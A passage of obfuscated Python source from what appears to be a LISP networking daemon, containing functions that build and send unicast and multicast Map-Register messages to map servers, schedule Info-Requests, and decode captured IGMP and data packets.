oo000 . nonce += 1
oo000 . alg_id = OoO000 . alg_id
oo000 . key_id = OoO000 . key_id
oo000 . proxy_reply_requested = OoO000 . proxy_reply
oo000 . merge_register_requested = OoO000 . merge_registrations
oo000 . map_notify_requested = OoO000 . want_map_notify
oo000 . xtr_id = OoO000 . xtr_id
oo000 . site_id = OoO000 . site_id
oo000 . encrypt_bit = ( OoO000 . ekey != None )
if ( OoO000 . refresh_registrations ) :
oo000 . map_register_refresh = refresh
if 77 - 77: I1Ii111
if ( OoO000 . ekey != None ) : oo000 . encryption_key_id = OoO000 . ekey_id
OooOOOOoO00OoOO = oo000 . encode ( )
oo000 . print_map_register ( )
if 85 - 85: oO0o - iIii1I11I1II1 / O0
if 99 - 99: II111iiii * IiII % iIii1I11I1II1 / Ii1I
if 90 - 90: oO0o % OOooOOo - OOooOOo % II111iiii * OoO0O00
if 39 - 39: I11i
if 58 - 58: i1IIi % o0oOOo0O0Ooo
OO000oooo0 = oo000 . encode_xtr_id ( b"" )
iI1iIii11Ii = II11iI111i1 [ 0 ]
OooOOOOoO00OoOO = OooOOOOoO00OoOO + iI1iIii11Ii + OO000oooo0
if 77 - 77: I1IiiI % O0
OoO000 . map_registers_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OooOOOOoO00OoOO , oo000 , OoO000 )
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
O00oOOooo += 1
if ( O00oOOooo % 100 == 0 and O0OoOoo00o ) :
oooO0o0o0O0 += .1
lisp . fprint ( "Sent {} Map-Registers, ipd {}" . format ( O00oOOooo ,
oooO0o0o0O0 ) )
if 95 - 95: IiII
time . sleep ( oooO0o0o0O0 )
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if ( O0OoOoo00o ) :
lisp . fprint ( "Sent total {} Map-Registers" . format ( O00oOOooo ) )
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
OoO000 . resolve_dns_name ( )
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if ( ms_only != None and OoO000 == ms_only ) : break
if 30 - 30: OoOoOO00
return
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
def oo0Oo00Oo0 ( ms ) :
global Ii1iI
global Oo
if 67 - 67: I11i - OOooOOo . i1IIi
lisp . lisp_set_exception ( )
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
OO0o0oO = [ Oo , Oo , Ooo ]
lisp . lisp_build_info_requests ( OO0o0oO , ms , lisp . LISP_CTRL_PORT )
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
i11i11 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) == None )
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
if ( iII1i11IIi1i . is_private_address ( ) and i11i11 == False ) :
OoOoO00O0 = lisp . red ( iII1i11IIi1i . print_address_no_iid ( ) , False )
lisp . lprint ( "Skip over RTR private address {}" . format ( OoOoO00O0 ) )
continue
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
lisp . lisp_build_info_requests ( OO0o0oO , iII1i11IIi1i , lisp . LISP_DATA_PORT )
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
Ii1iI . cancel ( )
Ii1iI = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oo0Oo00Oo0 , [ None ] )
Ii1iI . start ( )
return
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
def iii11 ( lisp_sockets ) :
global Oo0o , OOO0o0o
global Oo
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
lisp . lisp_set_exception ( )
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
i1iiI11I ( lisp_sockets , None , None , None , True )
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
if 91 - 91: oO0o + OoooooooOO - i1IIi
if 84 - 84: Ii1I / IiII
if ( lisp . lisp_l2_overlay ) :
OOOooo0OooOoO = [ None , "ffff-ffff-ffff" , True ]
oOoOOOo ( lisp_sockets , [ OOOooo0OooOoO ] )
if 43 - 43: i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if ( OOO0o0o != None ) :
OOO0o0o . cancel ( )
OOO0o0o = None
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if ( Oo0o ) : Oo0o . cancel ( )
Oo0o = threading . Timer ( I11 ,
iii11 , [ o0oOoO00o ] )
Oo0o . start ( )
return
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
def oOoOOOo ( lisp_sockets , entries ) :
iiIii1IIi = len ( entries )
if ( iiIii1IIi == 0 ) : return
if 10 - 10: i11iIiiIii - o0oOOo0O0Ooo % iIii1I11I1II1
i111IIIiI = None
if ( entries [ 0 ] [ 1 ] . find ( ":" ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_IPV6
if ( entries [ 0 ] [ 1 ] . find ( "." ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_IPV4
if ( entries [ 0 ] [ 1 ] . find ( "-" ) != - 1 ) : i111IIIiI = lisp . LISP_AFI_MAC
if ( i111IIIiI == None ) :
lisp . lprint ( "lisp_send_multicast_map_register() invalid group address" )
return
if 23 - 23: Oo0Ooo % I11i - OOooOOo % iIii1I11I1II1 . OoOoOO00
if 24 - 24: IiII / OoooooooOO + Ii1I % iIii1I11I1II1 - OOooOOo . OOooOOo
if 32 - 32: OOooOOo . IiII / OoO0O00
if 37 - 37: Ii1I % OoO0O00
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
iIiiiiii1 = [ ]
for ooooooo00o , oOO0oo , II1iIi1IiIii in entries :
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
iIiiiiii1 . append ( [ oOO0oo , II1iIi1IiIii ] )
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
oOOO0oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 83 - 83: I1Ii111
o0o0oOoOO0O = { }
entries = [ ]
for oOO0oo , II1iIi1IiIii in iIiiiiii1 :
ii111Ii11iii = lisp . lisp_lookup_group ( oOO0oo )
if ( ii111Ii11iii == None ) :
lisp . lprint ( "No group-mapping for {}, could be underlay group" . format ( oOO0oo ) )
if 62 - 62: iIii1I11I1II1
continue
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
lisp . lprint ( "Use group-mapping '{}' {} for group {}" . format ( ii111Ii11iii . group_name , ii111Ii11iii . group_prefix . print_prefix ( ) , oOO0oo ) )
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
IIi1i1I11Iii = ii111Ii11iii . group_prefix . instance_id
IiI111111IIII = ii111Ii11iii . use_ms_name
oo0O0oo = ii111Ii11iii . rle_address
if 14 - 14: O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
iii1III1i = IiI111111IIII
if ( oOOO0oo0 ) :
iii1III1i = lisp . lisp_get_decent_dns_name_from_str ( IIi1i1I11Iii , oOO0oo )
o0o0oOoOO0O [ iii1III1i ] = [ b"" , 0 ]
if 17 - 17: II111iiii / II111iiii
if 65 - 65: IiII + Oo0Ooo
if ( len ( ii111Ii11iii . sources ) == 0 ) :
entries . append ( [ "0.0.0.0" , oOO0oo , IIi1i1I11Iii , iii1III1i , oo0O0oo , II1iIi1IiIii ] )
continue
if 59 - 59: OoooooooOO + I11i . I1Ii111 - O0 % iIii1I11I1II1 / O0
for OO0Oooo0oOO0O in ii111Ii11iii . sources :
o0o0oOoOO0O [ iii1III1i ] = [ b"" , 0 ]
entries . append ( [ OO0Oooo0oOO0O , oOO0oo , IIi1i1I11Iii , iii1III1i , oo0O0oo , II1iIi1IiIii ] )
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
iiIii1IIi = len ( entries )
if ( iiIii1IIi == 0 ) : return
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
lisp . lprint ( "Build Map-Register for {} multicast entries" . format ( iiIii1IIi ) )
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
oOO = lisp . lisp_rle_node ( )
oOO . level = 128
II1i11i1iIi11 = lisp . lisp_get_any_translated_rloc ( )
oo0O0oo = lisp . lisp_rle ( "" )
oo0O0oo . rle_nodes . append ( oOO )
if 83 - 83: Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if ( oOOO0oo0 == False ) :
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
o0o0oOoOO0O [ OoO000 . ms_name ] = [ b"" , 0 ]
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
iIIi1iiI1i11 = None
if ( lisp . lisp_nat_traversal ) : iIIi1iiI1i11 = lisp . lisp_hostname
if 56 - 56: OoooooooOO
if 30 - 30: i11iIiiIii + oO0o
if 38 - 38: IiII . Ii1I
if 24 - 24: o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
I1 = 0
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
I1 += 1
if 13 - 13: OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - Oo0Ooo / oO0o
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if 83 - 83: O0 . I1IiiI
if 95 - 95: I11i . OoooooooOO - i1IIi - OoooooooOO - OoO0O00 % iIii1I11I1II1
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
iI1iIii11Ii = b""
for ooooooo00o , oOO0oo , IIi1i1I11Iii , i1i1IIIIi1i , i1I , II1iIi1IiIii in entries :
if 36 - 36: I1IiiI * Oo0Ooo
if 77 - 77: oO0o % i1IIi - Ii1I
if 93 - 93: OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if ( i1i1IIIIi1i not in o0o0oOoOO0O ) : continue
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
I1i1i1 = lisp . lisp_eid_record ( )
I1i1i1 . rloc_count = 1 + I1
I1i1i1 . authoritative = True
I1i1i1 . record_ttl = lisp . LISP_REGISTER_TTL if II1iIi1IiIii else 0
I1i1i1 . eid = lisp . lisp_address ( i111IIIiI , ooooooo00o , 0 , IIi1i1I11Iii )
if ( I1i1i1 . eid . address == 0 ) : I1i1i1 . eid . mask_len = 0
I1i1i1 . group = lisp . lisp_address ( i111IIIiI , oOO0oo , 0 , IIi1i1I11Iii )
if ( I1i1i1 . group . is_mac_broadcast ( ) and I1i1i1 . eid . address == 0 ) : I1i1i1 . eid . mask_len = 0
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
iiI = ""
IiI111111IIII = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
iiI = lisp . lisp_get_decent_index ( I1i1i1 . group )
iiI = lisp . bold ( str ( iiI ) , False )
iiI = "with decent-index {}" . format ( iiI )
else :
iiI = "for ms-name '{}'" . format ( i1i1IIIIi1i )
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
iIIIIiiIii = lisp . green ( I1i1i1 . print_eid_tuple ( ) , False )
lisp . lprint ( " EID-prefix {} {}{}" . format ( iIIIIiiIii , IiI111111IIII ,
iiI ) )
if 58 - 58: Oo0Ooo
iI1iIii11Ii += I1i1i1 . encode ( )
I1i1i1 . print_record ( " " , False )
o0o0oOoOO0O [ i1i1IIIIi1i ] [ 1 ] += 1
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc_name = iIIi1iiI1i11
if 83 - 83: OOooOOo
if 12 - 12: i1IIi . i1IIi - o0oOOo0O0Ooo
if 26 - 26: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
if ( II1i11i1iIi11 != None ) :
oOO . address = II1i11i1iIi11
elif ( i1I != None ) :
oOO . address = i1I
else :
oOO . address = i1I = lisp . lisp_myrlocs [ 0 ]
if 93 - 93: i1IIi
if 53 - 53: OoooooooOO + Oo0Ooo + oO0o
iiI1iI111ii1i . rle = oo0O0oo
iiI1iI111ii1i . local_bit = True
iiI1iI111ii1i . reach_bit = True
iiI1iI111ii1i . priority = 255
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 1
iiI1iI111ii1i . mweight = 100
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
iiI1iI111ii1i . print_record ( " " )
if 24 - 24: iII111i - IiII - iII111i * I1ii11iIi11i . OoooooooOO / IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
for iII1i11IIi1i in list ( lisp . lisp_rtr_list . values ( ) ) :
if ( iII1i11IIi1i == None ) : continue
iiI1iI111ii1i = lisp . lisp_rloc_record ( )
iiI1iI111ii1i . rloc . copy_address ( iII1i11IIi1i )
iiI1iI111ii1i . priority = 254
iiI1iI111ii1i . rloc_name = "RTR"
iiI1iI111ii1i . weight = 0
iiI1iI111ii1i . mpriority = 255
iiI1iI111ii1i . mweight = 0
iiI1iI111ii1i . local_bit = False
iiI1iI111ii1i . reach_bit = True
iI1iIii11Ii += iiI1iI111ii1i . encode ( )
iiI1iI111ii1i . print_record ( " RTR " )
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
o0o0oOoOO0O [ i1i1IIIIi1i ] [ 0 ] += iI1iIii11Ii
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
oo000 = lisp . lisp_map_register ( )
oo000 . nonce = 0xaabbccdddfdfdf00
oo000 . xtr_id_present = True
oo000 . proxy_reply_requested = True
oo000 . map_notify_requested = False
oo000 . merge_register_requested = True
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
for OoO000 in list ( lisp . lisp_map_servers_list . values ( ) ) :
iii1III1i = OoO000 . dns_name if oOOO0oo0 else OoO000 . ms_name
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if ( iii1III1i not in o0o0oOoOO0O ) : continue
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
oo000 . record_count = o0o0oOoOO0O [ iii1III1i ] [ 1 ]
if ( oo000 . record_count == 0 ) : continue
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
oo000 . nonce += 1
oo000 . alg_id = OoO000 . alg_id
oo000 . alg_id = OoO000 . key_id
oo000 . xtr_id = OoO000 . xtr_id
oo000 . site_id = OoO000 . site_id
oo000 . encrypt_bit = ( OoO000 . ekey != None )
OooOOOOoO00OoOO = oo000 . encode ( )
oo000 . print_map_register ( )
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
OO000oooo0 = oo000 . encode_xtr_id ( b"" )
OooOOOOoO00OoOO = OooOOOOoO00OoOO + iI1iIii11Ii + OO000oooo0
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
OoO000 . map_registers_multicast_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OooOOOOoO00OoOO , oo000 , OoO000 )
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
OoO000 . resolve_dns_name ( )
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
time . sleep ( .001 )
if 47 - 47: o0oOOo0O0Ooo
return
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
def i1II11Iii1I ( parms , not_used , packet ) :
global Ooo , o0oOoO00o
if 92 - 92: OOooOOo % IiII % OoOoOO00
iIi1Ii = parms [ 0 ]
i1 = parms [ 1 ]
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if ( lisp . lisp_is_macos ( ) == False ) :
IIi1iI = 4 if iIi1Ii == "lo0" else 16
packet = packet [ IIi1iI : : ]
if 92 - 92: OoO0O00 * ooOoO0o
if 35 - 35: i11iIiiIii
if 99 - 99: II111iiii . o0oOOo0O0Ooo + O0
if 71 - 71: IiII + i1IIi * Oo0Ooo % Oo0Ooo / Oo0Ooo
if 55 - 55: OoooooooOO + I1Ii111 + OoooooooOO * ooOoO0o
oo = struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ]
if ( oo == 2 ) :
o0oOOO0 = lisp . lisp_process_igmp_packet ( packet )
if ( type ( o0oOOO0 ) != bool ) :
oOoOOOo ( o0oOoO00o , o0oOOO0 )
return
if 61 - 61: o0oOOo0O0Ooo / OoOoOO00 - Oo0Ooo
if 19 - 19: iII111i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + Oo0Ooo
if 98 - 98: iIii1I11I1II1 % OOooOOo + I11i . ooOoO0o
if 99 - 99: O0 + O0 * I11i + O0 * oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
OOoOoo00Oo = packet
packet , ooooooo00o , Iiii1iiiIiI1 , I11Iii1 = lisp . lisp_is_rloc_probe ( packet , 0 )
if ( OOoOoo00Oo != packet ) :
if ( ooooooo00o == None ) : return
lisp . lisp_parse_packet ( o0oOoO00o , packet , ooooooo00o , Iiii1iiiIiI1 , I11Iii1 )
return
if 16 - 16: Ii1I * OoO0O00 / oO0o
if 22 - 22: oO0o + iIii1I11I1II1 % Oo0Ooo / I11i / Ii1I
if 54 - 54: OoOoOO00 % IiII . i11iIiiIii
if 93 - 93: ooOoO0o % i11iIiiIii % I1Ii111
if 64 - 64: I1Ii111 + I1IiiI * O0 / Oo0Ooo - I11i % I11i
if 59 - 59: OOooOOo + OoooooooOO
if 55 - 55: i11iIiiIii % iIii1I11I1II1 . i1IIi + OoooooooOO / i11iIiiIii
if ( struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ] & 0xf0 == 0x40 ) :
I11I1i1iI = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
if ( lisp . lisp_nat_traversal and I11I1i1iI == lisp . LISP_DATA_PORT ) : return
packet = lisp . lisp_reassemble ( packet )
if ( packet == None ) : return
if 90 - 90: IiII * II111iiii % I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
packet = lisp . lisp_packet ( packet )
i1i1 = packet . decode ( True , Ooo , lisp . lisp_decap_stats )
if ( i1i1 == None ) : return
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
packet . print_packet ( "Receive" , True )
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
if 41 - 41: O0 * ooOoO0o - OoOoOO00 . Ii1I
if 65 - 65: Oo0Ooo . OoooooooOO
if 70 - 70: Oo0Ooo - oO0o . iIii1I11I1II1 % I11i / OoOoOO00 - O0
if 55 - 55: iII111i - OoO0O00
if 100 - 100: O0
if 79 - 79: iIii1I11I1II1
if 81 - 81: OOooOOo + iIii1I11I1II1 * I1Ii111 - iIii1I11I1II1 . OOooOOo
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 48 - 48: I11i . OoooooooOO . I1IiiI . OoOoOO00 % I1ii11iIi11i / iII111i
ooooooo00o = packet . inner_source . print_address_no_iid ( )
packet . strip_outer_headers ( )
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , ooooooo00o , I11I1i1iI )
lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
return
if 11 - 11: i1IIi % OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
